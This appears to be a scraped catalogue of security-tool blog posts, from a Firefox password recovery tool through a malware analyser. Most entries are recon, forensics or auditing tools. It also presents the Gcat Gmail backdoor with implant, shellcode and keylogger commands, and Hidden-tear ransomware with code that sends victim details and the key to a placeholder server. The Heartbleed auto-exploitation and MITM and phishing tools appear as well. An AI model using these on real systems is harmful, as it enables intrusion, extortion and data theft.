  • Includes Installer for local Installation & Uninstallation. 

FirePassword - Firefox Username & Password Recovery Tool


FirePassword is first ever tool (back in early 2007) released to recover the stored website login passwords from Firefox Browser.

Like other browsers, Firefox also stores the login details such as username, password for every website visited by the user at the user consent. All these secret details are stored in Firefox sign-on database securely in an encrypted format. FirePassword can instantly decrypt and recover these secrets even if they are protected with Master Password.

Also FirePassword can be used to recover sign-on passwords from different profile (for other users on the same system) as well as from the different operating system (such as Linux, Mac etc). This greatly helps forensic investigators who can copy the Firefox profile data from the target system to different machine and recover the passwords offline without affecting the target environment.

This mega release supports password recovery from new password file 'logins.json' starting with Firefox version 32.x.

Note: FirePassword is not hacking or cracking tool as it can only help you to recover your own lost website passwords that are previously stored in Firefox browser.

It works on wider range of platforms starting from Windows XP to Windows 8.

Features
  • Instantly decrypt and recover stored encrypted passwords from 'Firefox Sign-on Secret Store' for all versions of Firefox.
  • Recover Passwords from Mozilla based SeaMonkey browser also.
  • Supports recovery of passwords from local system as well as remote system. User can specify Firefox profile location from the remote system to recover the passwords.
  • It can recover passwords from Firefox secret store even when it is protected with master password. In such case user have to enter the correct master password to successfully decrypt the sign-on passwords.
  • Automatically discovers Firefox profile location based on installed version of Firefox.
  • On successful recovery operation, username, password along with a corresponding login website is displayed
  • Fully Portable version, can be run from anywhere.
  • Integrated Installer for assisting you in local Installation & Uninstallation. 

Download FirePassword

Flashlight - Automated Information Gathering Tool for Penetration Testers


Pentesters spend too much time during information gathering phase. Flashlight (Fener) provides services to scan network/ports and gather information rapidly on target networks. So Flashlight should be the choice to automate discovery step during a penetration test. In this article, usage of Flashligh application will be explained.

For more information about using Flashlight, "-h" or "-help" option can be used.

Parameters for the usage of this application can be listed below

  • -h, --help: It shows the information about using the Flashlight application.
  • -p <ProjectName> or --project < ProjectName>: It sets project name with the name given. This paramater can be used to save different projects in different workspaces.
  • -s <ScanType> or –scan_type < ScanType >: It sets the type of scans. There are four types of scans: Active Scan , Passive Scan, Screenshot Scan and Filtering. These types of scans will be examined later in detail.
  • -d < DestinationNetwork>, --destination < DestinationNetwork >: It sets the network or IP where the scan will be executed against.
  • -c <FileName>, --config <FileName>: It specifies the configuration file. The scanning is realized according to the information in the configuration file.
  • -u <NetworkInterface>, --interface < NetworkInterface>: It sets the network interface used during passive scanning.
  • -f <PcapFile>, --pcap_file < PcapFile >: It sets cap File that will be filtered.
  • -r <RasterizeFile>, --rasterize < RasterizeFile>: It sets the specific location of Rasterize JavaScript file which will be used for taking screenshots.
  • -t <ThreadNumber>, --thread <Threadnember>: It sets the number of Threads. This parameter is valid only on screenshot scanning (screen scan) mode.
  • -o <OutputDiectory>, --output < OutputDiectory >: It sets the directory in which the scan results can be saved. The scan results are saved in 3 sub-directories : For Nmap scanning results, "nmap" subdirectory, for PCAP files "pcap" subdirectory and for screenshots "screen" subdirectories are used. Scan results are saved in directory, shown under the output directories by this parameter. If this option is not set, scan results are saved in the directory that Flashlight applications are running.
  • -a, --alive: It performs ping scan to
  • “-I” parameter is chosen.
  • -l <LogFile>, --log < LogFile >: It specifies the log file to save the scan results. If not set, logs are saved in “flashlight.log” file in working directory.
  • -k <PassiveTimeout>, --passive_timeout <PassiveTimeout>: It specifies the timeout for sniffing in passive mode. Default value is 15 seconds. This parameter is used for passive scan.
  • -m, --mim: It is used to perform MITM attack.
  • -n, --nmap-optimize: It is used to optimize nmap scan.
  • -v, --verbose: It is used to list detailed information.
  • -V, --version: It specifies version of the program. 
  •  discover up IP addresses before the actual vulnerability scan. It is used for active scan.
  • -g <DefaultGateway>, --gateway < DefaultGateway >: It identifies the IP address of the gateway. If not set, interface with “-I” parameter is chosen.
  • -l <LogFile>, --log < LogFile >: It specifies the log file to save the scan results. If not set, logs are saved in “flashlight.log” file in working directory.
  • -k <PassiveTimeout>, --passive_timeout <PassiveTimeout>: It specifies the timeout for sniffing in passive mode. Default value is 15 seconds. This parameter is used for passive scan.
  • -m, --mim: It is used to perform MITM attack.
  • -n, --nmap-optimize: It is used to optimize nmap scan.
  • -v, --verbose: It is used to list detailed information.
  • -V, --version: It specifies version of the program. 

Videos :


https://www.youtube.com/watch?v=EUMKffaAxzs&list=PL1BVM6VWlmWZOv9Hv8TV2v-kAlUmvA5g7&index=4 https://www.youtube.com/watch?v=qCgW-SfYl1c&list=PL1BVM6VWlmWZOv9Hv8TV2v-kAlUmvA5g7&index=5 https://www.youtube.com/watch?v=98Soe01swR8&list=PL1BVM6VWlmWZOv9Hv8TV2v-kAlUmvA5g7&index=6 https://www.youtube.com/watch?v=9wft9zuh1f0&list=PL1BVM6VWlmWZOv9Hv8TV2v-kAlUmvA5g7&index=7

Installation

apt-get install nmap tshark tcpdump dsniff
In order to install phantomjs easily, you can download and extract it from https://bitbucket.org/ariya/phantomjs/downloads.
Flashlight application can perform 3 basic scan types and 1 analysis type. Each of them are listed below.

1) Passive Scan

In passive scan, no packets are sent into wire. This type of scan is used for listening network and analyzing packets.
To launch a passive scan by using Flashlight; a project name should be specified like “passive-pro-01”. In the following command, packets that are captured by eth0 are saved into “/root/Desktop/flashlight/output/passive-project-01/pcap" directory, whereas, Pcap files and all logs are saved into "/root/Desktop/log" directory.

./flashlight.py -s passive -p passive-pro-01 -i eth0 -o /root/Desktop/flashlight_test -l /root/Desktop/log –v

2) Active Scan

During an active scan, NMAP scripts are used by reading the configuration file. An example configuration file (flashlight.yaml) is stored in “config” directory under the working directory.
tcp_ports:
   - 21, 22, 23, 25, 80, 443, 445, 3128, 8080
udp_ports:
   - 53, 161
scripts:
   - http-enum

According to "flashlight.yaml" configuration file, the scan executes against "21, 22, 23, 25, 80, 443, 445, 3128, 8080" TCP ports, "53, 161" UDP ports, "http-enum" script by using NMAP.

Note: During active scan “screen_ports” option is useless. This option just works with screen scan.
“-a” option is useful to discover up hosts by sending ICMP packets. Beside this, incrementing thread number by using “-t” parameter increases scan speed.

./flashlight.py -p active-project -s active -d 192.168.74.0/24 –t 30 -a -v

By running this command; output files in three different formats (Normal, XML and Grepable) are emitted for four different scan types (Operating system scan, Ping scan, Port scan and Script Scan).

The example commands that Flashlight Application runs can be given like so:

  • Operating System Scan: /usr/bin/nmap -n -Pn -O -T5 -iL /tmp/"IPListFile" -oA /root/Desktop/flashlight/output/active-project/nmap/OsScan-"Date"
  • Ping Scan: /usr/bin/nmap -n -sn -T5 -iL /tmp/"IPListFile" -oA /root/Desktop/flashlight/output/active-project/nmap/PingScan-"Date"
  • Port Scan: /usr/bin/nmap -n -Pn -T5 --open -iL /tmp/"IPListFile" -sS -p T:21,22,23,25,80,443,445,3128,8080,U:53,161 -sU -oA /root/Desktop/flashlight/output/active-project/nmap/PortScan-"Date"
  • Script Scan: /usr/bin/nmap -n -Pn -T5 -iL /tmp/"IPListFile" -sS -p T:21,22,23,25,80,443,445,3128,8080,U:53,161 -sU --script=default,http-enum -oA /root/Desktop/flashlight/output/active-project/nmap/ScriptScan-"Date" 

 3) Screen Scan

Screen Scan is used to get screenshots of web sites/applications by using directives in config file (flashlight.yaml). Directives in this file provide screen scan for four ports ("80, 443, 8080, 8443") screen_ports: - 80, 443, 8080, 8443 Sample screen scan can be performed like this: ``` ./flashlight.py -p project -s screen -d 192.168.74.0/24 -r /usr/local/rasterize.js -t 10 -v ```

4) Filtering

Filtering option is used to analyse pcap files. An example for this option is shown below: ``` ./flashlight.py -p filter-project -s filter -f /root/Desktop/flashlight/output/passive-project-02/pcap/20150815072543.pcap -v ``` By running this command some files are created on “filter” sub-folder. This option analyzes PCAP packets according to below properties:
  • Windows hosts
  • Top 10 DNS requests

...


Download Flashlight

Forpix - Software for detecting affine image files


forpix is a forensic program for identifying similar images that are no longer identical due to image manipulation. Hereinafter I will describe the technical background for the basic understanding of the need for such a program and how it works.

From image files or files in general you can create so-called cryptologic hash values, which represent a kind of fingerprint of the file. In practice, these values have the characteristic of being unique. Therefore, if a hash value for a given image is known, the image can be uniquely identified in a large amount of other images by the hash value. The advantage of this fully automated procedure is that the semantic perception of the image content by a human is not required. This methodology is an integral and fundamental component of an effective forensic investigation.

Due to the avalanche effect, which is a necessary feature of cryptologic hash functions, a minimum -for a human not to be recognized- change of the image causes a drastic change of the hash value. Although the original image and the manipulated image are almost identical, this will not apply to the hash values any more. Therefore the above mentioned application for identification is ineffective in the case of similar images.

A method was applied that resolves the ineffectiveness of cryptologic hash values. It uses the fact that an offender is interested to preserve certain image content. In some degree, this will preserve the contrast as well as the color and frequency distribution. The method provides three algorithms to generate robust hash values of the mentioned image features. In case of a manipulation of the image, the hash values change either not at all or only moderately similar to the degree of manipulation. By comparing the hash values of a known image with those of a large quantity of other images, similar images can now be recognized fully automated.

Download Forpix

FruityWifi v2.2 - Wireless Network Auditing Tool


FruityWifi is an open source tool to audit wireless networks. It allows the user to deploy advanced attacks by directly using the web interface or by sending messages to it.

Initialy the application was created to be used with the Raspberry-Pi, but it can be installed on any Debian based system.

FruityWifi v2.0 has many upgrades. A new interface, new modules, Realtek chipsets support, Mobile Broadband (3G/4G) support, a new control panel, and more.


A more flexible control panel. Now it is possible to use FruityWifi combining multiple networks and setups:

- Ethernet ⇔ Ethernet,
- Ethernet ⇔ 3G/4G,
- Ethernet ⇔ Wifi,
- Wifi ⇔ Wifi,
- Wifi ⇔ 3G/4G, etc.

Within the new options on the control panel we can change the AP mode between Hostapd or Airmon-ng allowing to use more chipsets like Realtek.

It is possible customize each one of the network interfaces which allows the user to keep the current setup or change it completely.

Changelog

v2.2
  • Wireless service has been replaced by AP module
  • Mobile support has been added
  • Bootstrap support has been added
  • Token auth has been added
  • minor fix
v2.1
  • Hostapd Mana support has been added
  • Phishing service has been replaced by phishing module
  • Karma service has been replaced by karma module
  • Sudo has been implemented (replacement for danger)
  • Logs path can be changed
  • Squid dependencies have been removed from FruityWifi installer
  • Phishing dependencies have been removed from FruityWifi installer
  • New AP options available: hostapd, hostapd-mana, hostapd-karma, airmon-ng
  • Domain name can be changed from config panel
  • New install options have been added to install-FruityWifi.sh
  • Install/Remove have been updated

Download FruityWifi

FTPMap - FTP scanner in C


Ftpmap scans remote FTP servers to indentify what software and what versions they are running. It uses program-specific fingerprints to discover the name of the software even when banners have been changed or removed, or when some features have been disabled. also FTP-Map can detect Vulnerables by the FTP software/version.

COMPILATION
./configure
make
make install

Using ftpmap is trivial, and the built-in help is self-explanatory :

Examples :
ftpmap -s ftp.c9x.org

ftpmap -P 2121 -s 127.0.0.1

ftpmap -u joe -p joepass -s ftp3.c9x.org

If a named host has several IP addresses, they are all sequentially scanned. During the scan, ftpmap displays a list of numbers : this is the "fingerprint" of the server.

Another indication that can be displayed if login was successful is the FTP PORT sequence prediction. If the difficulty is too low, it means that anyone can steal your files and change their content, even without knowing your password or sniffing your network.

There are very few known fingerprints yet, but submissions are welcome.

Obfuscating FTP servers

This software was written as a proof of concept that security through obscurity doesn't work. Many system administrators think that hidding or changing banners and messages in their server software can improve security. 

Don't trust this. Script kiddies are just ignoring banners. If they read that "XYZ FTP software has a vulnerability", they will try the exploit on all FTP servers they will find, whatever software they are running. The same thing goes for free and commercial vulnerability scanners. They are probing exploits to find potential holes, and they just discard banners and messages. 

On the other hand, removing software name and version is confusing for the system administrator, who has no way to quickly check what's installed on his servers. 

If you want to sleep quietly, the best thing to do is to keep your systems up to date : subscribe to mailing lists and apply vendor patches. 

Downloading Ftpmap
git clone git://github.com/Hypsurus/ftpmap 


Download FTPMap

Gcat - A stealthy Backdoor that uses Gmail as a command and control server


A stealthy Python based backdoor that uses Gmail as a command and control server.

Setup

For this to work you need:
  • A Gmail account (Use a dedicated account! Do not use your personal one!)
  • Turn on "Allow less secure apps" under the security settings of the account
This repo contains two files:
  • gcat.py a script that's used to enumerate and issue commands to available clients
  • implant.py the actual backdoor to deploy
In both files, edit the gmail_user and gmail_pwd variables with the username and password of the account you previously setup.
You're probably going to want to compile implant.py into an executable using Pyinstaller

Usage
Gcat

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger
  • Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the OS the implant is running on
  • Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command
  • Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • That's the gist of it! But you can do much more as you can see from the usage of the script! ;)

Download Gcat

Geotweet - Social engineering tool for human hacking


Another way to use Twitter and instagram. Geotweet is an osint application that allows you to track tweets and instagram and trace geographical locations and then export to google maps. Allows you to search on tags, world zones and user (info and timeline).

Requirements
  • Python 2.7
  • PyQt4, tweepy, geopy, ca_certs_locater, python-instagram
  • Works on Linux, Windows, Mac OSX, BSD

Installation
git clone https://github.com/Pinperepette/Geotweet_GUI.git
cd Geotweet_GUI
chmode +x Geotweet.py
sudo apt-get install python-pip
sudo pip install tweepy
sudo pip install geopy
sudo pip install ca_certs_locater
sudo pip install python-instagram
python ./Geotweet.py


Video


Download Geotweet

GetHead - HTTP Header Analysis Vulnerability Tool

gethead.py is a Python HTTP Header Analysis Vulnerability Tool. It identifies security vulnerabilities and the lack of protection in HTTP Headers.

Usage:
$ python gethead.py http://domain.com

Changelog
Version 0.1 - Initial Release
  • Written in Python 2.7.5
  • Performs HTTP Header Analysis
  • Reports Header Vulnerabilities

Features in Development
Version 0.2 - Next Release (April 2014 Release)
  • Support for git updates
  • Support for Python 3.3
  • Complete Header Analysis
  • Additional Logic for Severity Classifications
  • Rank Vulnerabilities by Severity
  • Export Findings with Description, Impact, Execution, Fix, and References
  • Export with multi-format options (XML, HTML, TXT)

Version 0.3 - Future Release (May 2014 Release)
  • Replay and Inline Upstream Proxy support to import into other tools
  • Scan domains, sub-domains, and multi-services
  • Header Injection and Fuzzing functionality
  • HTTP Header Policy Bypassing
  • Modularize and port to more platforms
    (e.g. gMinor, Kali, Burp Extension, Metasploit, Chrome, Firefox)

Ghiro 0.2 - Automated Digital Image Forensics Tool


Sometime forensic investigators need to process digital images as evidence. There are some tools around, otherwise it is difficult to deal with forensic analysis with lot of images involved.

Images contain tons of information, Ghiro extracts these information from provided images and display them in a nicely formatted report.

Dealing with tons of images is pretty easy, Ghiro is designed to scale to support gigs of images.

All tasks are totally automated, you have just to upload you images and let Ghiro does the work.

Understandable reports, and great search capabilities allows you to find a needle in a haystack.

Ghiro is a multi user environment, different permissions can be assigned to each user. Cases allow you to group image analysis by topic, you can choose which user allow to see your case with a permission schema.

Use Cases

Ghiro can be used in many scenarios, forensic investigators could use it on daily basis in their analysis lab but also people interested to undercover secrets hidden in images could benefit. Some use case examples are the following:
  • If you need to extract all data and metadata hidden in an image in a fully automated way
  • If you need to analyze a lot of images and you have not much time to read the report for all them
  • If you need to search a bunch of images for some metadata
  • If you need to geolocate a bunch of images and see them in a map
  • If you have an hash list of "special" images and you want to search for them

Anyway Ghiro is designed to be used in many other scenarios, the imagination is the only limit.

Video

MAIN FEATURES

Metadata extraction

Metadata are divided in several categories depending on the standard they come from. Image metadata are extracted and categorized. For example: EXIF, IPTC, XMP.

GPS Localization

Embedded in the image metadata sometimes there is a geotag, a bit of GPS data providing the longitude and latitude of where the photo was taken, it is read and the position is displayed on a map.

MIME information

The image MIME type is detected to know the image type your are dealing with, in both contacted (example: image/jpeg) and extended form.

Error Level Analysis

Error Level Analysis (ELA) identifies areas within an image that are at different compression levels. The entire picture should be at roughly the same level, if a difference is detected, then it likely indicates a digital modification.

Thumbnail extraction

The thumbnails and data related to them are extracted from image metadata and stored for review.

Thumbnail consistency

Sometimes when a photo is edited, the original image is edited but the thumbnail not. Difference between the thumbnails and the images are detected. 

Signature engine 

Over 120 signatures provide evidence about most critical data to highlight focal points and common exposures.

Hash matching

Suppose you are searching for an image and you have only the hash. You can provide a list of hashes and all images matching are reported.


Gitrob - Reconnaissance tool for GitHub organizations


Gitrob is a command line tool that can help organizations and security professionals find such sensitive information. The tool will iterate over all public organization and member repositories and match filenames against a range of patterns for files, that typically contain sensitive or dangerous information.

How it works

Looking for sensitive information in GitHub repositories is not a new thing, it has been known for a while that things such as private keys and credentials can be found with GitHub's search functionality, however Gitrob makes it easier to focus the effort on a specific organization.

The first thing the tool does is to collect all public repositories of the organization itself. It then goes on to collect all the organization members and their public repositories, in order to compile a list of repositories that might be related or have relevance to the organization.

When the list of repositories has been compiled, it proceeds to gather all the filenames in each repository and runs them through a series of observers that will flag the files, if they match any patterns of known sensitive files. This step might take a while if the organization is big or if the members have a lot of public repositories.

All of the members, repositories and files will be saved to a PostgreSQL database. When everything has been sifted through, it will start a Sinatra web server locally on the machine, which will serve a simple web application to present the collected data for analysis.


Download Gitrob

GoAccess - Real-time Web Log Analyzer and Interactive Viewer


GoAccess is an open source real-time web log analyzer and interactive viewer that runs in a terminal in *nix systems. It provides fast and valuable HTTP statistics for system administrators that require a visual server report on the fly.

Features 

GoAccess parses the specified web log file and outputs the data to the X terminal.
  • General statistics, bandwidth, etc.
  • Time taken to serve the request (useful to track pages that are slowing down your site)
  • Top visitors
  • Requested files & static files
  • 404 or Not Found
  • Hosts, Reverse DNS, IP Location
  • Operating Systems
  • Browsers and Spiders
  • Referring Sites & URLs
  • Keyphrases
  • Geo Location - Continent/Country/City
  • Visitors Time Distribution New
  • HTTP Status Codes
  • Ability to output JSON and CSV
  • Different Color Schemes
  • Support for large datasets + data persistence
  • Support for IPv6
  • Output statistics to HTML. See report
  • and more...
GoAccess allows any custom log format string. Predefined options include, but not limited to:
  • Amazon CloudFront (Download Distribution).
  • Apache/Nginx Common/Combined + VHosts
  • W3C format (IIS)

Why GoAccess?

The main idea behind GoAccess is being able to quickly analyze and view web server statistics in real time without having to generate an HTML report. Although it is possible to generate an HTML, JSON, CSV report, by default it outputs to a terminal.
You can see it more as a monitor command tool than anything else.


Gping - Ping, But With A Graph


Ping, but with a graph

Install and run
Created/tested with Python 3.4, should run on 2.7 (will require the statistics module though).
pip3 install pinggraph

Tested on Windows and Ubuntu, should run on OS X as well. After installation just run:
gping [yourhost]

If you don't give a host then it pings google.

Why?
My apartments internet is all 4g, and while it's normally pretty fast it can be a bit flakey. I often found myself running ping -t google.com in a command window to get a rough idea of the network speed, and I thought a graph would be a great way to visualize the data. I still wanted to just use the command line though, so I decided to try and write a cross platform one that I could use. And here we are.

Code
For a quick hack the code started off really nice, but after I decided pretty colors were a good addition it quickly got rather complicated. Inside pinger.py is a function plot() , this uses a canvas-like object to "draw" things like lines and boxes to the screen. I found on Windows that changing the colors is slow and caused the screen to flicker, so theres a big mess of a function called process_colors to try and optimize that. Don't ask.


Download Gping

Graudit - Find potential security flaws in source code using grep


Graudit is a simple script and signature sets that allows you to find potential security flaws in source code using the GNU utility grep. It's comparable to other static analysis applications like RATS, SWAAT and flaw-finder while keeping the technical requirements to a minimum and being very flexible.

Who should use graudit?
System administrators, developers, auditors, vulnerability researchers and anyone else that cares to know if the application they develop, deploy or otherwise use is secure.

What languages are supported?
  • ASP
  • JSP
  • Perl
  • PHP
  • Python
  • Other (looks for suspicious comments, etc)

USAGE
Graudit supports several options and tries to follow good shell practices. For a list of the options you can run graudit -h or see below. The simplest way to use graudit is;
graudit /path/to/scan

DEPENDENCIES
Required: bash, grep, sed

The following options are available:
  -A scan ALL files
  -c  number of lines of context to display, default is 2
  -d  database to use
  -h prints a short help text
  -i case in-sensitive search
  -l lists databases available
  -L vim friendly lines
  -v prints version number
  -x exclude these files
  -z supress colors
  -Z high contrast colors


Download Graudit

Grinder - System to Automate the Fuzzing of Web Browsers


Grinder is a system to automate the fuzzing of web browsers and the management of a large number of crashes. Grinder Nodes provide an automated way to fuzz a browser, and generate useful crash information (such as call stacks with symbol information as well as logging information which can be used to generate reproducible test cases at a later stage). A Grinder Server provides a central location to collate crashes and, through a web interface, allows multiple users to login and manage all the crashes being generated by all of the Grinder Nodes.

System Requirements

A Grinder Node requires a 32/64 bit Windows system and Ruby 2.0 (Ruby 1.9 is also supported but you wont be able to fuzz 64bit targets).
A Grinder Server requires a web server with MySQL and PHP.

Features

Grinder Server features:
  • Multi user web application. User can login and manage all crashes reported by the Grinder Nodes. Administrators can create more users and view the login history.
  • Users can view the status of the Grinder system. The activity of all nodes in the system is shown including status information such as average testcases being run per minute, the total crashes a node has generated and the last time a node generated a crash.
  • Users can view all of the crashes in the system and sort them by node, target, fuzzer, type, hash, time or count.
  • Users can view crash statistics for the fuzzers, including total and unique crashes per fuzzer and the targets each fuzzer is generating crashes on.
  • Users can hide all duplicate crashes so as to only show unique crashes in the system in order to easily manage new crashes as they occur.
  • Users can assign crashes to one another as well as mark a particular crash as interesting, exploitable, uninteresting or unknown.
  • Users can store written notes for a particular crash (viewable to all other users) to help manage them.
  • Users can download individual crash log files to help debug and recreate testcases.
  • Users can create custom filters to exclude uninteresting crashes from the list of crashes.
  • Users can create custom e-mail alerts to alert them when a new crash comes into the system that matches a specific criteria.
  • Users can change their password and e-mail address on the system as well as view their own login history.
Grinder Node features:
  • A node can be brought up and begin fuzzing any supported browser via a single command.
  • A node injects a logging DLL into the target browser process to help the fuzzers perform logging in order to recreate testcases at a later stage.
  • A node records useful crash information such as call stack, stack dump, code dump and register info and also includes any available symbol information.
  • A node can automatically encrypt all crash information with an RSA public key.
  • A node can automatically report new crashes to a remote Grinder Server.
  • A node can run largely unattended for a long period of time.

Grinder Screenshots





Download Grinder

Gryffin - Large Scale Web Security Scanning Platform

Gryffin is a large scale web security scanning platform. It is not yet another scanner. It was written to solve two specific problems with existing scanners: coverage and scale.

Better coverage translates to fewer false negatives. Inherent scalability translates to capability of scanning, and supporting a large elastic application infrastructure. Simply put, the ability to scan 1000 applications today to 100,000 applications tomorrow by straightforward horizontal scaling.

Coverage
Coverage has two dimensions - one during crawl and the other during fuzzing. In crawl phase, coverage implies being able to find as much of the application footprint. In scan phase, or while fuzzing, it implies being able to test each part of the application for an applied set of vulnerabilities in a deep.

Crawl Coverage
Today a large number of web applications are template-driven, meaning the same code or path generates millions of URLs. For a security scanner, it just needs one of the millions of URLs generated by the same code or path. Gryffin's crawler does just that.

Page Deduplication
At the heart of Gryffin is a deduplication engine that compares a new page with already seen pages. If the HTML structure of the new page is similar to those already seen, it is classified as a duplicate and not crawled further.

DOM Rendering and Navigation
A large number of applications today are rich applications. They are heavily driven by client-side JavaScript. In order to discover links and code paths in such applications, Gryffin's crawler uses PhantomJS for DOM rendering and navigation.

Scan Coverage
As Gryffin is a scanning platform, not a scanner, it does not have its own fuzzer modules, even for fuzzing common web vulnerabilities like XSS and SQL Injection.
It's not wise to reinvent the wheel where you do not have to. Gryffin at production scale at Yahoo uses open source and custom fuzzers. Some of these custom fuzzers might be open sourced in the future, and might or might not be part of the Gryffin repository.
For demonstration purposes, Gryffin comes integrated with sqlmap and arachni. It does not endorse them or any other scanner in particular.
The philosophy is to improve scan coverage by being able to fuzz for just what you need.

Scale
While Gryffin is available as a standalone package, it's primarily built for scale.
Gryffin is built on the publisher-subscriber model. Each component is either a publisher, or a subscriber, or both. This allows Gryffin to scale horizontally by simply adding more subscriber or publisher nodes.

Operating Gryffin

Pre-requisites
  1. Go
  2. PhantomJS, v2
  3. Sqlmap (for fuzzing SQLi)
  4. Arachni (for fuzzing XSS and web vulnerabilities)
  5. NSQ ,
    • running lookupd at port 4160,4161
    • running nsqd at port 4150,4151
    • with --max-msg-size=5000000
  6. Kibana and Elastic search, for dashboarding

Installation
go get github.com/yahoo/gryffin/...

Run

TODO

  1. Mobile browser user agent
  2. Preconfigured docker images
  3. Redis for sharing states across machines
  4. Instruction to run gryffin (distributed or standalone)
  5. Documentation for html-distance
  6. Implement a JSON serializable cookiejar.
  7. Identify duplicate url patterns based on simhash result.

Download Gryffin

Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)



Heartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written with python.

For scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory of vulnerable system to check after.

Hearbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS.
git clone https://github.com/hybridus/heartbleedscanner.git

Sample usage

To scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file:
python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r

To scan the same network against SMTP Over SSL/TLS and randomize the IP addresses
python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r

If you already have a target list which you created by using nmap/zmap
python heartbleedscan.py -i targetlist.txt

Dependencies

Before using Heartbleed Vulnerability Scanner, you should install python-netaddr package.

CentOS or CentOS-like systems :
yum install python-netaddr

Ubuntu or Debian-like systems :
apt-get insall python-netaddr


Download Heartbleed Vulnerability Scanner

Hidden-tear - An open source ransomware-like file crypter

     _     _     _     _              _                  
    | |   (_)   | |   | |            | |                 
    | |__  _  __| | __| | ___ _ __   | |_ ___  __ _ _ __ 
    | '_ \| |/ _` |/ _` |/ _ \ '_ \  | __/ _ \/ _` | '__|
    | | | | | (_| | (_| |  __/ | | | | ||  __/ (_| | |   
    |_| |_|_|\__,_|\__,_|\___|_| |_|  \__\___|\__,_|_|   

It's a ransomware-like file crypter sample which can be modified for specific purposes.

Features
  • Uses AES algorithm to encrypt files.
  • Sends encryption key to a server.
  • Encrypted files can be decrypt in decrypter program with encryption key.
  • Creates a text file in Desktop with given message.
  • Small file size (12 KB)
  • Doesn't detected to antivirus programs (15/08/2015) http://nodistribute.com/result/6a4jDwi83Fzt

Demonstration Video

Usage
  • You need to have a web server which supports scripting languages like php,python etc. Change this line with your URL. (You better use Https connection to avoid eavesdropping)
    string targetURL = "https://www.example.com/hidden-tear/write.php?info=";
  • The script should writes the GET parameter to a text file. Sending process running in SendPassword() function
    string info = computerName + "-" + userName + " " + password;
    var fullUrl = targetURL + info;
    var conent = new System.Net.WebClient().DownloadString(fullUrl);
    
  • Target file extensions can be change. Default list:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

Legal Warning

While this may be helpful for some, there are significant risks. hidden tear may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.


Download Hidden-tear

Hook Analyser 3.2 - Malware Analysis Tool


Hook Analyser is a freeware application which allows an investigator/analyst to perform “static & run-time / dynamic” analysis of suspicious applications, also gather (analyse & co-related) threat intelligence related information (or data) from various open sources on the Internet.

Essentially it’s a malware analysis tool that has evolved to add some cyber threat intelligence features & mapping.

Hook Analyser is perhaps the only “free” software in the market which combines analysis of malware analysis and cyber threat intelligence capabilities. The software has been used by major Fortune 500 organisations.

Features/Functionality
  • Spawn and Hook to Application – Enables you to spawn an application, and hook into it
  • Hook to a specific running process – Allows you to hook to a running (active) process
  • Static Malware Analysis – Scans PE/Windows executables to identify potential malware traces
  • Application crash analysis – Allows you to analyse memory content when an application crashes
  • Exe extractor – This module essentially extracts executables from running process/s

Release 

On this releases, significant improvements and capabilities have been added to the Threat Intelligence module.

Following are the key improvements and enhanced features -

  • The malware analysis module has been improved - and new signatures have been added
  • Cyber Threat Intelligence module -
    • IP Intelligence module (Analyse multiple IP addresses instead of just 1!). Sample output -
    • Keyword Intelligence module (Analyse keywords e.g. Internet Explorer 11, IP address, Hash etc). Sample output - 
    • Network file (PCAP) analysis - Analyse user-provided .PCAP file and performs analysis on external IP addresses. Example -

    • Social Intelligence (Pulls data from Twitter- for user-defined keywords and performs network analysis). Example -


Let's look at "HOW-TO-USE" of this releases (Cyber Threat Intelligence) -

The tool can perform analysis via 2 methods - auto mode and manual mode.

In the auto mode, the tool will use the following files for analysis -

  1. Channels.txt (Path: feeds->channels.txt): Specify the list of the twitter related channels or keywords for monitoring. In the Auto mode, the monitoring is performed for 2 minutes only, however if you'd like to monitor indefinitely, please select the manual mode. 
    • Example - 
  2. intelligence-ipdb.txt (Path: feeds->intelligence-ipdb.txt): Specify the list of IP addresses you'd like to analyse. Yes, you can provide as many IPs you'd like to.
    • Example - 
  3. Keywords.txt (Path: feeds->Keywords.txt): Specify the list of keywords you'd like to analyse. Yes, you can provide as many keywords you'd like to.
    • Example - 
